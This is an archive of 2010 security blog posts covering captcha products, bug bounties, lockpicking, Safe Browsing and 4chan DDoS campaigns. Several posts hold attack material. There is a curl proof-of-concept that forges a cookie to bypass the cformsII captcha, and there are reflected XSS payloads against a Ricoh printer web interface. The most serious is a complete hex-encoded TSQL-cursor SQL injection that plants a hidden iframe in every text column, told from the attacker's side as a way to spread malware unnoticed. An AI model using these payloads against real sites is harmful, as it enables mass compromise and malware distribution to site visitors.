Tuesday, 28 December 2010

A few words about NuCaptcha

After my recent posting about the Cforms Captcha Bypass Vulnerability, the folks over at NuCaptcha asked me to take a look at their offering. I took a poke around the free version of the product/service that they offer.

A Slightly Different Approach:
Lots of people are trying to come up with new and innovative approaches to the Captcha concept as OCR bots continually demolish a lot of the products out there. On top of that, there are pay services now, where humans will sit and crunch captchas for you all day long. This leaves us with a question of how to change the game enough to continue moving forward. I've seen a lot of different ideas about this, and NuCaptcha's is far from the most innovative. That being said, it works well enough for now. Their Captchas are animated, and display text that both is and isn't part of the captcha. You are asked to enter only the text that appears in red.

This is definitely a step in the right direction. That being said, the red text always appears at the end of the string. I would think it might be a little more effective to randomly colourise characters within the string, not clumping them together, and not putting them at a predictable location. Also, since they are colour-coded, I can certainly envision an OCR bot capable of distinguishing colours. This is compensated for a bit by all the animation in the background, especially the variants with full advertisements behind the text, which provide a lot of 'noise' to help confuse any OCR bots. However, I don't think the NuCaptcha system is going to be impervious to OCR techniques, not by a long shot.

Ways I might suggest to improve this technique:

  1. Use random characters out of the larger text string to colour code
  2. Colourise all characters in the string in different colours, and randomly select the 'correct' colour on each request (one request wants the blue letters, the next the yellows, etc.), sort of adding entropy to both the letters and the colours (see the sketch below)
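A rough sketch of what suggestion 2 could look like (PHP; the colour set and the hand-off to the renderer are made up purely for illustration, this is nobody's actual implementation):
----------------------
<?php
### Colour every character at random, then pick which colour counts as
### 'correct' for this particular request.
$captcha = 'w7kpm3xr';                             // the full displayed string
$colours = array('red', 'blue', 'yellow', 'green');

do {
    $answerColour = $colours[mt_rand(0, count($colours) - 1)];
    $answer = '';
    $render = array();
    for ($i = 0; $i < strlen($captcha); $i++) {
        $c = $colours[mt_rand(0, count($colours) - 1)];
        $render[] = array('char' => $captcha[$i], 'colour' => $c);
        if ($c === $answerColour) {
            $answer .= $captcha[$i];               // part of the expected input
        }
    }
} while ($answer === '');                          // re-roll if nothing matched

### $render goes to the animation layer; the server stores $answer (or a hash)
### and the prompt becomes "enter only the $answerColour letters".
----------------------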
What about the paid human captcha-solving services? Well, NuCaptcha claims they address this by increasing the amount of time it takes a person to recognise and complete each captcha by a few seconds. Whether this is true or not, I doubt that it will make much of a serious impact. That being said, if anyone has any better ideas out there, I'd love to hear them.

Where their technique really shines is more in usability than security. I have gotten to the point where the mere sight of a captcha irritates me. They are often so illegible that an actual human has a hard time filling the stupid things out correctly on the first try. I do not feel any of that frustration with their system. Also, the idea to blend advertising space into their solution is a pretty savvy business move in my opinion.

The Pseudo-Technical:

So I took some preliminary dives through their offerings. They offer PHP, Java, and .NET APIs. I subjected the .NET and Java APIs to some static analysis tools and let them run. I then ran some quick PHP examples and their WordPress plugin through a web application scanner and let it fly. I grabbed some of their SWF components and ran them through a decompiler app, and didn't find much of interest there. Finally I poked and prodded from within Burp Suite looking for anything unusual.

The long and short of it is that I found nothing of real interest. I have not, and probably will not, go digging line by line through their source code. For one thing, it looks like a bunch of the real work is offloaded to internal webapps on their side. For another, nothing in my cursory examinations turned up anything the least bit indicative of a problem. Maybe someone more determined will come along and find something I missed.

So is NuCaptcha the "most secure" captcha solution out there? Beats me. I don't honestly know how to make such a comparison in the marketplace. What I do know is that it works, it is end-user friendly, and it does not have any glaring defects. Perhaps not as glowing of a recommendation as they were hoping for, but anything more definitive is just asking for me to be proven wrong. Cheers!

UPDATE: Christopher Bailey from NuCaptcha wanted me to point out that the red letters option is only one form the security Captcha can take. They have different variants, as can be seen here. The actual captcha text is still always at a predictable location within the string though, so my suggestion about randomly selecting characters within the string still stands. Thanks to the folks from NuCaptcha for inviting me to take a peek though. I certainly appreciate their openness if nothing else.

Friday, 17 December 2010

Dear Mr Haywood, Welcome to 2010

There has been some controversy over the recent rise in bug bounty programs. One response was issued by Anthony Haywood, CTO of Idappcom. You can find his article here. I read it in disbelief at some of the 'points' espoused within. I will avoid the more mundane trollings of the article and try to stick to the salient points.

At Idappcom, we’d argue that these sorts of schemes are nothing short of a publicity stunt and, infact, can be potentially dangerous to an end users security.
This is the crux of his argument. It is 2010, and we are still hearing the Security through Obscurity argument touted as a valid security strategy?

One concern is that, by inviting hackers to trawl all over a new application prior to its launch, just grants them more time to interrogate it and identify weaknesses which they may decide is more valuable if kept to themselves.
If a company is already at the phase of its security evolution where it is attempting bug bounties, it more than likely has an SDL in place. This SDL should include rigorous review, source code analysis, and even penetration testing by an internal security team. Nobody is suggesting that a company should rely solely on bug bounties to find its security flaws. Intimating that this is happening is a red herring, and this statement is a classic example of FUD in action. Mr Haywood is essentially saying "If you let hackers see your program before your customers get it, they will be even more likely to find ways to abuse it". First of all, to my knowledge these bug bounties do not include distributing pre-release versions of code to hackers on the Internet. It is simply a way of incentivising security researchers and/or hackers towards responsible disclosure by offering a monetary reward for their contribution. Mr. Haywood, hackers are already going to be trawling all over these applications. A bug bounty is just trying to bribe them into giving what they find back to the vendor.

Which ties into my second point: what's the difference if they see it now or later? If a company does what you're suggesting, there will be a portion of people who may well hold back the information to use after release. There will, however, also be legitimate security researchers who will turn over what they find, which will likely overlap with the findings of the malicious sorts. This increases the chance that the vendor will be able to issue a fix before going to release. Explain to me again how this is dangerous, or negative in any way?

The hacker would happily claim the reward, promise a vow of silence and then ‘sell’ the details on the black market leaving any user, while the patch is being developed or if they fail to install the update, with a great big security void in their defences just waiting to be exploited.

Yes, some malicious hackers will try to do evil, but the good guys will likely find the same things and report them. Your statement seems to imply that anyone looking over the code would be malicious. Frankly, I find this insulting. I have turned in numerous vulnerabilities to vendors without so much as a promise of reward. I have gone full disclosure in the event that my attempts to elicit a response from the vendor have failed. The same can be said about any number of small-time folk like me, never mind people like Tavis Ormandy, Michal Zalewski, HD Moore, Jeremiah Grossman, Rob Hansen, etc. You seem to be taking a pretty broad shot at the security community in general with statements such as these. Moving on.

Sometimes it’s not even a flaw in the software that can cause problems. If an attack is launched against the application, causing it to fail and reboot, then this denial of service (DOS) attack can be just as costly to your organisation as if the application were breached and data stolen.
I'm not even sure what point you are trying to make here. Yes, there are denial of service vulnerabilities out there. What does that have to do with your argument at all?

A final word of warning is that, even if the application isn’t hacked today, it doesn’t mean that tomorrow they’re not going to be able to breach it.
That's exactly right. That is why a continuous security program needs to be in place. Security needs to be a factor from project conception, through the development lifecycle, all the way past release. Testing needs to be done continually. A bug bounty is a way of crowd sourcing continued testing in the wild.

IT’s never infallible and for this reason penetration testing is often heralded as the hero of the hour. That said technology has moved on and, while still valid in certain circumstances, historical penetration testing techniques are often limited in their effectiveness. Let me explain – a traditional test is executed from outside the network perimeter with the tester seeking applications to attack.
Wow. You take one possible portion of a penetration test and say "this is what a penetration test is", while ignoring all the other factors at play. An external-only black box pen test may go like this, but there are many different ways to perform a pen test, depending upon the engagement.

However, as these assaults are all from a single IP address, intelligent security software will recognise this behaviour as the IP doesn’t change. Within the first two or three attempts the source address is blacklisted or fire walled and all subsequent traffic is immaterial as all activities are seen and treated as malicious.
If you are really, really bad at performing penetration tests, this may be true. A real penetration tester will pivot whenever possible. Since we are specifically talking about AppSec (that's short for Application Security, Mr Haywood) this becomes even more relevant. In pen testing web apps it is extremely easy to disguise yourself as a perfectly normal user. A standard IPS is mostly ineffective in this realm, and WAFs are notoriously hard to configure in any meaningful way that does not break a complex application's functionality. Also, remembering that we are talking AppSec, a good pen tester will probably have proxies he can flow through. So if an IP gets blocked, he just comes from a different IP.

I was a little perplexed by this strange attack on penetration testing. Then I found this article:

Idappcom seeks to displace penetration testers


Where you claim that your nifty little appliance will somehow replace penetration testers. So we can read your entire position as "don't trust manual testing, buy our product instead". Hardly the first time we've seen such a tactic from the vendors. Let's take a look at this for a moment though. Will your appliance detect someone exploiting a business logic flaw? Will it shut down an attacker connecting to a file share with an overly permissive ACL? Will it be able to detect multi-step attacks against web applications? Will it really notice a SQL injection attack, and if so, how does it know the difference between a valid query and an injected one? These are the sorts of questions that present the burning need for manual human review on a repeat basis. No matter how hard you try, you will never be able to fully automate this. Actual humans will always find things a program can't. Let's move back to the techjournalsouth.com article though.

 Instead you need two and both need to be conducted simultaneously if your network’s to perform in perfect harmony:

   Application testing combined with intrusion detection

Congratulations, we have all been saying there is no magic bullet for a long time. However, you present only two layers of defence in depth. Application testing and IPS by themselves are not enough. You need a full Security Development Lifecycle. You need firewalls and IPS systems that are properly configured and audited on a regular basis. You need policies governing change management and configuration management. You need proper network segmentation and separation of duties. You need hands-on testers who know how to tear an application or system apart and find the weak points.


Intrusion detection, capable of spotting zero day exploits, must be deployed to audit and test the recognition and response capabilities of your corporate security defences. It will substantiate that, not only is the network security deployed and configured correctly, but that it’s capable of protecting the application that you’re about to make live or have already launched irrespective of what the service it supports is – be it email, a web service, anything.

First of all, see some of my previous points about IPS/WAFs and protecting against web application attacks. Secondly, let's talk about your 'zero day' protection. This protection is only as good as the signatures loaded into the device. I could write an entire book on why signature-based security mechanisms are doomed to fail, and I would be far from the first person to speak at length on this subject. For some of the high points just look back at my posts with Michal Zalewski about the anti-virus world. I'll leave it there.

While we wait with baited breath to see who will lift Deutsche Post’s Security Cup we mustn’t lose sight of our own challenges. My best advice would be that, instead of waiting for the outcome and relying on others to keep you informed of vulnerabilities in your applications, you must regularly inspect your defences to make sure they’re standing strong with no chinks. If you don’t the bounty may as well be on your head.
Yes, and one of the ways you inspect these defences is to have skilled people testing them on a regular basis. Relying on a magic bullet security appliance or application to save you is irresponsible and foolish. Don't buy into vendor FUD.

Special thanks to Dino Dai Zovi (found here and here) for pointing out this article.



Wednesday, 15 December 2010

cformsII CAPTCHA Bypass Vulnerability

The cformsII plugin for WordPress contains a vulnerability within its Captcha verification functionality. This vulnerability exists due to an inherent trust of user-controlled input. An attacker could utilise this vulnerability to completely bypass the captcha security mechanism on any WordPress forms created with this plugin.

Captcha Generation:
CformsII generates its captcha by randomly selecting characters from the character set a-k, m, n, p-z, 2-9. I assume that the letters l and o, and the numerals 1 and 0, were excluded to avoid any confusion when rendered as an image. It selects a random number of these characters based on preset minimum and maximum limits, and assembles a string of them. It then creates an md5 hash of this string, prepends 'i+' to the hash and sets it as a cookie called 'turing_string_'. See the below code excerpts:
----------------------
$min = prep( $_REQUEST['c1'],4 );
$max = prep( $_REQUEST['c2'],5 );
$src = prep( $_REQUEST['ac'], 'abcdefghijkmnpqrstuvwxyz23456789');
----------------------

### captcha random code
$srclen = strlen($src)-1;
$length = mt_rand($min,$max);

$turing = '';
for($i=0; $i<$length; $i++)
$turing .= substr($src, mt_rand(0, $srclen), 1);

$tu = ($_REQUEST['i']=='i')?strtolower($turing):$turing;

setcookie('turing_string_'.$no, $_REQUEST['i'].'+'.md5($tu),(time()+60*60*5),"/");
--------------------------

This cookie is set when the user is presented with the generated captcha image. When they submit their completed form, the captcha code is submitted in a POST parameter titled 'cforms_captcha'. This parameter is then md5'd and compared to the md5 value from the turing_string_ cookie. If the two hashes match, then it is considered to be valid.

-------------------------
else if( $field_type == 'captcha' ){  ### captcha verification

         $validations[$i+$off] = 1;

$a = explode('+',$_COOKIE['turing_string_'.$no]);

$a = $a[1];
$b = md5( ($captchaopt['i'] == 'i')?strtolower($_REQUEST['cforms_captcha'.$no]):$_REQUEST['cforms_captcha'.$no]);

if ( $a <> $b ) {
$validations[$i+$off] = 0;
$err = !($err)?2:$err;
}

}
-----------------------

The end result is that an attacker could pre-set a 'valid' captcha string. They then take the md5 hash of the string, prepend "i%2b" (URL-encoded 'i+') to the value, and set that as the turing_string_ cookie for their POST requests. Every request sent with this parameter and cookie combination will be inherently trusted as valid from the Captcha standpoint.
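To make the bypass concrete, here's a minimal proof-of-concept sketch (PHP with curl; the target URL, the empty form-number suffix, and the extra form fields are placeholder assumptions):
----------------------
<?php
### We pick our own 'valid' answer, hash it ourselves, and hand the server
### both halves -- it will happily compare our hash against our own answer.
$answer = 'aaaa';             // any string; lowercase sidesteps the 'i' flag
$no     = '';                 // form number suffix (assumed: first form)
$cookie = 'turing_string_' . $no . '=i%2b' . md5($answer);

$post = http_build_query(array(
    'cforms_captcha' . $no => $answer,
    // ...plus whatever other fields the target form requires...
));

$ch = curl_init('http://victim.example/contact-page/');   // placeholder URL
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);

### The plugin md5s our POSTed answer and compares it to the cookie hash we
### set -- they match by construction, so the captcha check always passes.
----------------------
Reusing the same cookie/parameter pair across thousands of requests is all it takes to automate form submissions.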

The problem here is twofold. The first issue is that the captcha codes are not one-time-use codes, as they should be. So even without tricking the Captcha system in the first place, it would be possible to launch a replay attack against this system to generate large amounts of submissions. Each captcha code should only be valid for one use, and only during a very limited time window.

The second problem is the trust of user-supplied data. The process is meant to validate entered data against another piece of data. However, both sets of data are freely offered up to the client side for tampering. This completely negates the verification process, as the server side is not truly in control of the validation at this point.

The take-away:
Using cookies to store captcha data and then comparing against user-supplied input is not an appropriate method of validation, for a number of reasons. The captcha code, whether in raw or hashed form, should be stored server-side for validation, should be valid for only one use, and should be valid only for a limited timeframe. This could be done by using an in-memory array, a database, or even a flat file.
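For illustration, a minimal sketch of what the server-side alternative might look like (not cforms' actual code; session storage, the five-minute window, and the reject handling are my own assumptions):
----------------------
<?php
session_start();

### at generation time: keep the hash on the server, never in a cookie
$turing = '...';                      // the code from the existing generator
$_SESSION['captcha'] = array(
    'hash'    => md5($turing),
    'expires' => time() + 300,        // assumption: five-minute validity
);

### at verification time
$ok = isset($_SESSION['captcha'])
   && time() < $_SESSION['captcha']['expires']
   && md5($_REQUEST['cforms_captcha']) === $_SESSION['captcha']['hash'];

### one-time use: burn the stored value whether the attempt passed or failed
unset($_SESSION['captcha']);

if (!$ok) {
    // reject the submission
}
----------------------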

Tuesday, 9 November 2010

Ricoh Web Image Monitor 2.03 Reflected XSS Vuln

I was poking at some Ricoh MFPs several days ago when I found this. It is nothing to get too terribly excited about, as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be treated as a threat. Companies have taken big hits from less. So without further ado, here are the petty little details:

Fun with Redirects:
My initial test was just an abuse of the redirect functionality that is being exploited for the vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>


A more traditional XSS test will still work just as well of course:

Traditional Test:
GET /?--></script><script>alert(51494)</script> HTTP/1.1


HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>

Thursday, 4 November 2010

Abusing TSQL Cursors for massive SQL Injection

I'm sure that there are plenty of people who already know about this technique; however, I have only recently discovered it. Upon research, it looks like some malware goonies were using this to try and spread Zeus. We are going to look at a very fast and nasty way of abusing a SQL Injection vector. We will be abusing TSQL cursors in order to rewrite a very large amount of data. So let's build this attack.

First we want to craft our ultimate payload. In this case we are going to make an iframe such as this:

<iframe SRC="http://cosine-security.blogspot.com">
Now we want to spray our hidden little iframe all over the site. In order to maximise our potential of exposing viewers to it, we are going to overwrite all the char, varchar, nchar, and nvarchar fields. We will append our iframe to the end of each record, trying to just add ourselves to the existing data and avoid notice for as long as possible. This is where the TSQL cursor comes into play. We are going to declare a cursor based off of the sysobjects and syscolumns tables. We are looking in those tables for a list of all the *char columns in user-defined tables. We then use the cursor to fetch each record and append our iframe in. The query should look something like this:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<iframe SRC="http://cosine-security.blogspot.com">''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

When we are all done, we close up shop, and deallocate the cursor. If everything went right, then we will be flying under the radar, and it could be a long time before anyone notices what we have done.

So now we have our payload, but we still need to get it in through the SQL Injection vector. To do this, we are going to use the DECLARE/CAST/EXEC method. We will convert our query to hex, which will give us:

0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b27273c696672616d65205352433d22687474703a2f2f636f73696e652d73656375726974792e626c6f6773706f742e636f6d223e272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72

In our injection string we will declare a variable ("DECLARE @S"), cast our hex string to NVARCHAR into @S, and then, finally, EXEC @S. Once we have it built, we then URL encode it, and we have a nasty little package to send:

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b27273c696672616d65205352433d22687474703a2f2f636f73696e652d73656375726974792e626c6f6773706f742e636f6d223e272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72%20AS%20NVARCHAR(4000));EXEC(@S);
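If you want to reproduce the encoding step, it's trivial to script. A minimal sketch in PHP (variable names are mine; splice in the full one-line cursor query from above where I've truncated it):
----------------------
<?php
### The plaintext cursor payload (truncated here for readability).
$payload = 'DECLARE @T varchar(255),@C varchar(255) ... DEALLOCATE Table_Cursor';

### Hex-encode it so the single quotes survive any quote filtering, then
### wrap it in the DECLARE/CAST/EXEC shell.
$hex = '0x' . bin2hex($payload);
$injection = "DECLARE @S NVARCHAR(4000);SET @S=CAST($hex AS NVARCHAR(4000));EXEC(@S);";

### Only the spaces need escaping to match the package shown above.
echo str_replace(' ', '%20', $injection);
----------------------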

This method could of course be used in a number of different ways, but this is probably the best bang for the buck. A quick and horribly easy way to turn a vulnerable site into a malware launching platform.

Saturday, 9 October 2010

Epic FALE!

So I got back from Security BSides Atlanta last night. There were some interesting talks out there, especially the one on Google and Bing hacking. Some really neat stuff there. Right now though, I want to talk about the guys from FALE. I heard these guys were going to be at BSides from Schuyler Towne's Kickstarter update. Here's what Schuyler had to say, for all of you nonbackers:
I'm sorry you can't be there. However - you can and should go to B-Sides, Atlanta! My friends at FALE: http://lockfale.com/, will be there running workshops, giving talks, and bringing tons of goodies. It's their first time running a Lockpicking Village, but I think they've got an honest shot to make it one of the best in the country. I just shipped them 1.5 gigs of material I've produced too, so hopefully that will add to their already considerable stores.
So go to BSides I did. Hang out at the Lockpicking Village I did. I walked in the door and John immediately said "Hey man, come on in and pick a lock". All the FALE guys introduced themselves, and I told them I was there because of Schuyler's post. That really got things going. Then I told them about the Charlotte Hackerspace and things really got moving. I spent a lot of time in the Lockpicking Village, picking locks and hanging out with these guys. They had three challenges running, each one resulting in your name being entered into a drawing. The first challenge was to simply pick a lock. The second challenge, "The MacGuyver Challenge", was to make your own tool out of scraps and open a lock with it. I went what I thought would be the easiest route, and made a padlock shim. It took me six or so tries to get one the right size that wouldn't break in the lock. In the process I cut my thumbs up pretty good. In the end I did open a Brinks padlock with my shim though. The final challenge was "The Pro Challenge". This involved opening one of their higher-difficulty locks with security drivers. It took me almost an hour and a half, but I finally got that sucker open, and I was super happy!

In the drawings, I actually got drawn twice, once for my MacGuyver win, which got me a nice starter set of the Sparrows Wizwazzles. I also got drawn for my Pro Challenge win and would have taken the largest Southern Specialties basket, but they had a strict one-win policy. They wouldn't let me upgrade either =/ . It was okay though, because the guy who did win was pretty excited about it, and I was really happy for him. Besides, I will have a big set of Schuyler's picks coming anyways.

The day wrapped up and I braved the god-forsaken Atlanta beltway to start home. Once I was clear of the heaviest traffic I decided to pull off at a Wendy's for dinner. Imagine my surprise when, up at the counter, I heard someone shout my name. I turned around, and there were the FALE guys. So we sat down, had dinner and hung out for a little bit. I have gotten past the straight boring facts now, so let me just say this: these guys are so awesome. I had so much fun hanging out with them it was nuts. They are smart guys, no doubt, but they are also super friendly, and just plain cool. One of the greatest things about them is their passion. These guys know a lot about lock picking, and over that dinner they shared a lot of tips and secrets with me. What was great though, was not the knowledge itself, but the atmosphere around that table. These guys loved not only doing locksport, and knowing locksport, but sharing locksport. These were not like some of your typical hackers, who like to hoard knowledge and dole it out in small bits to make themselves pseudo-important. These guys couldn't stop spilling knowledge all over the place. It's like they couldn't help themselves!

They asked me about what I thought they could do better next time. I had really very little to offer from this standpoint, except that it would have been cool to talk more about wafer, disc, and tubular locks, and that competitions would also have been cool. They also asked me about the Hackerspace, and have expressed a lot of strong interest in coming to visit, and maybe doing a talk for us. Whether they come up here, or I go down there next, I don't know. What I do know is that FALE and I have not seen the last of each other. Thanks John, Evan, Matt, Scott, and Adam! Oh, and thank you Schuyler for inspiring me to go in the first place!

Wednesday, 29 September 2010

Google and Safe(r) Browsing

So Google has announced a new tool. This tool, Safe Browsing Alerts, seeks to notify ISPs of malicious web content hosted on their AS. I love to see things like this, and it gives me a little hope for the future. It is the proverbial step in the right direction to my line of thinking. The fight against malware needs to become more proactive. However, I don't know how effective letting AS owners know will be. The information really needs to go more towards hosting companies and the like: people with the ability to pull content.

Here is my brief, idealized dream. We take the Stop Badware model and expand it. A strong coalition is created to proactively identify malicious content on the internet and stamp it out where possible. This coalition would include the major AV vendors (Kaspersky, F-Secure, TrendMicro, Symantec, McAfee, Sophos, etc.) and the major search engines Google, Microsoft, and Yahoo (does anyone really use Yahoo anymore?). A crawler is designed to go out across the web and look for malicious content. I am envisioning two main branches of this:


  1. As new exploits/payloads are discovered, the crawler searches for specific files or content that indicate the presence of the exploit or payload. A very Google-hacking approach. This would be like looking for the Windows RDP web connection by doing intitle:"Remote Desktop Web Connection" inurl:tsweb . This detection can be avoided fairly easily, but it will still quickly catch some of the low-hanging fruit.
  2. The actual crawler. This crawler goes out and actually analyses the content on the pages it crawls and looks for malicious content. This would be hard to do efficiently, I suspect, but could be done with proper resources.
So, assuming this dream comes true, what happens next? Well, a couple of things would happen at this point. The discovered malicious content would be catalogued. This would then be fed back to the participating companies. It would go to the AV vendors to examine and create new definitions if needed. It would go to the search providers to reflect in their own search engine results. Suddenly, alongside your Google or Bing results, you see a warning: "Potentially Dangerous Content Detected". This serves as a warning to the public, sort of a "caveat lector". Then the coalition should attempt to notify the appropriate parties. This could include AS owners, hosting companies, and/or whois contact persons.

None of this, of course, 'solves' the problem. It is still up to individuals to do the right things. It is up to the user to not go to a site flagged as dangerous, and to have appropriate protection on their machine. It is up to the webmaster to make sure that their sites are not compromised, or hosting malicious content. What this could do, however, is raise visibility and awareness. It would give malware fewer places to lurk. Of course the bad guys will just move faster, finding new ways of hiding their stuff. It would be a start though. Anyways, that's just my silly little dream. Who knows, maybe it will one day become a reality.

Friday, 24 September 2010

The Invisible War: March of the /b/tards

Here goes an attempt at starting a 'series'. The name 'Invisible War' may be reaching a bit, but sometimes it feels like it is appropriate. There are things developing on the internet that have very interesting ramifications. Perhaps I should say growing, instead of developing, as it seems a rather organic process. Today I would like to talk about the Internet Hate Machine that is 4chan.

For a very long time, the Internet has been growing these places. Usenet and IRC have always been bastions of trolls, flamers, and people you just don't want to get into it with. Offensive tactics often included various attack tools to carry out wars of annoyance against targets. I can very clearly remember the good ol' days of IRC, full of skiddies with ICMP "nukers" and takeover scripts etc. As with everything else on the Internet, the Hate Machine grew and changed.

4chan has become the ultimate embodiment of this writhing entity, thanks to /b/. The denizens of 4chan's /b/, known as /b/tards, are an interesting and complicated 'group'. I use the term 'group' very loosely. /b/ is almost anarchy incarnate, and to assign any real structure to it would be disingenuous. The /b/tards gave rise to Anonymous and all of the internet grief that particular group has caused. If you don't know, Anonymous is the group that carried out the campaign against the Church of Scientology. They launched site defacements, distributed videos that the church tried to suppress, and even organised real-life protests outside of Church of Scientology facilities. Anonymous began to demonstrate the true power of Internet crowd sourcing.

Recently, the /b/tards have been on the move again. The news is abuzz with their attacks against the MPAA, RIAA, Aiplex Software, and BPI. This is allegedly in direct response to actions taken against the torrent hosting site thepiratebay.org. While not all of the attacks were successful, they have attracted a lot of notice. One has to wonder if that isn't the true aim. What would they accomplish, long term, by bringing down these servers? Even if they brought them down for more than a few hours, they would be brought back up, and actions would be taken to mitigate the attacks. They are not silencing their opposition, so maybe the goal is the opposite: to create a lot of noise. How many people knew about what Aiplex Software was getting up to before, and how many know now? The same with ACS:Law? How much longer will the whole piracy issue stay in people's attention now because of these antics?

I do not know if this result was intended, or if the /b/tards are acting out of a much more visceral drive. Given that the average /b/tard is not amongst the highest forms of life on this planet, I would not ascribe much forethought to most of their actions. /b/ is rather like a horde of rampaging orcs, but like orcs, once they get started they can be surprisingly effective. I find myself pondering the possibility of a few dark sorcerers pulling the strings of this unruly horde. I look at the 'call to arms' for some of these attacks, and a lot of the time people start using crappy pre-built skiddie tools that probably have no chance of being truly effective against a serious target. However, if there were a few well-hidden masterminds behind the scenes, we would see a different picture.

Suppose you are a botherder or malicious hacker with a sinister agenda. You have decided that you can no longer stand Foo Corp's policies, and want to take them down. You read the reports though; you know even botnets get tracked back to their owners a lot of the time. You need some way to keep the focus off of you. So you go crowd sourcing in /b/. You whip the /b/tards into a frenzy and they pull out their toys and get ready. Some of them undoubtedly know what they are actually doing, and that is even better. Now, you give them all a time and date, and everyone launches their attack. The IR team at Foo Corp all of a sudden sees the deluge hitting their perimeter. While the firewalls and IPS are deflecting most of the useless crap that is being flung at them, you and a few of the more clever blokes slip right past their perimeter. Their IPS systems are already screaming at the top of their lungs, so who's to notice? You get in, do your damage, and get out. Meanwhile, the deluge continues. By the time it is all done, the folks at Foo Corp are going to have their hands full tracking back through the logs for quite a while. This means that the chances of anything being tracked back to you are greatly diminished.

So are the denizens of /b/ the new secret cyber warriors? Is there a core cadre within Anonymous that is using the rest of the /b/ crew as little more than pawns? Are they guided by a belief that they are in the right? There seems to be evidence that at least some of them are waging an information war. They strike at powerful targets who manipulate the system to their advantage. Groups like the Church of Scientology, MPAA, BPI, etc. get away with an awful lot by turning the system to their advantage, and they use considerable monetary resources and influence to ensure that they always have the upper hand. So are groups like Anonymous just turning the tables a bit? Is this the beginning of digital revolution? Or is it all just a bunch of angry adolescents with nothing better to do?

I don't have the answers to those questions. What I do know is that this is a sign of things to come. The Internet is becoming more and more concrete. Impact on the net is having more and more tangible impact in the real world. As this trend increases, what is that going to do to the balance of power in our society, with groups like Anonymous running around?

For more information on the recent attacks please read:
http://www.theregister.co.uk/2010/09/24/piracy_threat_lawyers_withstand_ddos/
http://www.theregister.co.uk/2010/09/20/4chan_ddos_mpaa_riaa/
http://www.sophos.com/blogs/chetw/g/2010/09/19/4chan-takes-mpaa-riaa-aiplex-wins/
http://torrentfreak.com/4chan-ddos-takes-down-mpaa-and-anti-piracy-websites-100918/

Wednesday, 22 September 2010

The CEPT Exam Practical

